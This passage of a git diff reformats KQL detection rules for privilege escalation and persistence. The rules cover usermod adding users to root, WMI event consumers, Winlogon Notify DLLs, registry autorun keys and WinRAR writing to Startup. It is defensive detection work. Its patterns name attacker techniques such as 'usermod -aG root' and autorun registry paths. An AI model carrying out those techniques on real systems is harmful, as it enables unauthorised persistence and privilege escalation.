usage of the "usermod" binary to add users add users to the root or suoders groups -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence -// False Positives: -// - Legitimate administrator activities - -DeviceProcessEvents +// Title: User Added To Root/Sudoers Group Using Usermod +// Author: TuanLe (GTSC) +// Date: 2022-12-21 +// Level: medium +// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence +// False Positives: +// - Legitimate administrator activities + +DeviceProcessEvents | where (ProcessCommandLine contains "-aG root" or ProcessCommandLine contains "-aG sudoers") and FolderPath endswith "/usermod" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql index 14a52d18..2f652946 100644 --- a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql +++ b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql @@ -1,10 +1,10 @@ -// Title: Using SettingSyncHost.exe as LOLBin -// Author: Anton Kutepov, oscd.community -// Date: 2020-02-05 -// Level: high -// Description: Detects using SettingSyncHost.exe to run hijacked binary -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008 - -DeviceProcessEvents +// Title: Using SettingSyncHost.exe as LOLBin +// Author: Anton Kutepov, oscd.community +// Date: 2020-02-05 +// Level: high +// Description: Detects using SettingSyncHost.exe to run hijacked binary +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008 + +DeviceProcessEvents | where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql index c545c7c2..96af8950 100644 --- a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql +++ b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql @@ -1,10 +1,10 @@ -// Title: VBScript Payload Stored in Registry -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-05 -// Level: high -// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 - -DeviceRegistryEvents +// Title: VBScript Payload Stored in Registry +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents | where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql index 3b7b7f7f..03c0e219 100644 --- a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql +++ b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql @@ -1,10 +1,10 @@ -// Title: Whoami.EXE Execution From Privileged Process -// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov -// Date: 2022-01-28 -// Level: high -// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.discovery, attack.t1033 - -DeviceProcessEvents +// Title: Whoami.EXE Execution From Privileged Process +// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov +// Date: 2022-01-28 +// Level: high +// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1033 + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql index e55b9cc6..51ce5ddf 100644 --- a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql +++ b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql @@ -1,12 +1,12 @@ -// Title: Windows Event Log Access Tampering Via Registry -// Author: X__Junior -// Date: 2025-01-16 -// Level: high -// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112 -// False Positives: -// - Administrative activity, still unlikely - -DeviceRegistryEvents +// Title: Windows Event Log Access Tampering Via Registry +// Author: X__Junior +// Date: 2025-01-16 +// Level: high +// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112 +// False Positives: +// - Administrative activity, still unlikely + +DeviceRegistryEvents | where ((RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD") or ((RegistryKey endswith "\\Policies\\Microsoft\\Windows\\EventLog*" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryKey endswith "\\ChannelAccess")) and (RegistryValueData contains "D:(D;" or (RegistryValueData contains "D:(" and RegistryValueData contains ")(D;")) and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql index d27ceae5..1a04b77d 100644 --- a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql +++ b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql @@ -1,12 +1,12 @@ -// Title: Windows Terminal Profile Settings Modification By Uncommon Process -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-22 -// Level: medium -// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015 -// False Positives: -// - Some false positives may occur with admin scripts that set WT settings. - -DeviceFileEvents +// Title: Windows Terminal Profile Settings Modification By Uncommon Process +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-22 +// Level: medium +// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015 +// False Positives: +// - Some false positives may occur with admin scripts that set WT settings. + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql index b75ed32e..dce118d6 100644 --- a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql +++ b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql @@ -1,10 +1,10 @@ -// Title: WINEKEY Registry Modification -// Author: omkar72 -// Date: 2020-10-30 -// Level: high -// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 - -DeviceRegistryEvents +// Title: WINEKEY Registry Modification +// Author: omkar72 +// Date: 2020-10-30 +// Level: high +// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 + +DeviceRegistryEvents | where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql index d06cabcd..d57db568 100644 --- a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql +++ b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql @@ -1,11 +1,11 @@ -// Title: Winlogon Notify Key Logon Persistence -// Author: frack113 -// Date: 2021-12-30 -// Level: high -// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. -// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004 - -DeviceRegistryEvents +// Title: Winlogon Notify Key Logon Persistence +// Author: frack113 +// Date: 2021-12-30 +// Level: high +// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. +// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004 + +DeviceRegistryEvents | where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql index eece0e6e..8a1dea3f 100644 --- a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql +++ b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql @@ -1,11 +1,11 @@ -// Title: WinRAR Creating Files in Startup Locations -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-16 -// Level: high -// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. -// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 - -DeviceFileEvents +// Title: WinRAR Creating Files in Startup Locations +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-16 +// Level: high +// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. +// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\WinRAR.exe" or InitiatingProcessFolderPath endswith "\\Rar.exe") and FolderPath contains "\\Start Menu\\Programs\\Startup\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql index 832f972c..6148dd5c 100644 --- a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: WinSock2 Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: WinSock2 Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql index db4f03e4..d94dee0b 100644 --- a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql +++ b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql @@ -1,10 +1,10 @@ -// Title: WMI Backdoor Exchange Transport Agent -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-11 -// Level: critical -// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 - -DeviceProcessEvents +// Title: WMI Backdoor Exchange Transport Agent +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-11 +// Level: critical +// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql index f19ea27b..467affdb 100644 --- a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql +++ b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql @@ -1,12 +1,12 @@ -// Title: WMI Persistence - Command Line Event Consumer -// Author: Thomas Patzke -// Date: 2018-03-07 -// Level: high -// Description: Detects WMI command line event consumers -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence -// False Positives: -// - Unknown (data set is too small; further testing needed) - -DeviceImageLoadEvents +// Title: WMI Persistence - Command Line Event Consumer +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: high +// Description: Detects WMI command line event consumers +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence +// False Positives: +// - Unknown (data set is too small; further testing needed) + +DeviceImageLoadEvents | where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql index 1d2e28ed..14818dbc 100644 --- a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql +++ b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql @@ -1,12 +1,12 @@ -// Title: WMI Persistence - Script Event Consumer File Write -// Author: Thomas Patzke -// Date: 2018-03-07 -// Level: high -// Description: Detects file writes of WMI script event consumer -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence -// False Positives: -// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe) - -DeviceFileEvents +// Title: WMI Persistence - Script Event Consumer File Write +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: high +// Description: Detects file writes of WMI script event consumer +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence +// False Positives: +// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe) + +DeviceFileEvents | where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql index bb60f6e9..45ea6561 100644 --- a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Wow6432Node Classes Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Wow6432Node Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql index 2d3ba19d..da42fd2d 100644 --- a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Wow6432Node CurrentVersion Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Wow6432Node CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql index b85affc9..6472a03f 100644 --- a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where ((RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or RegistryValueData endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" or isnull(RegistryValueData)))) \ No newline at end 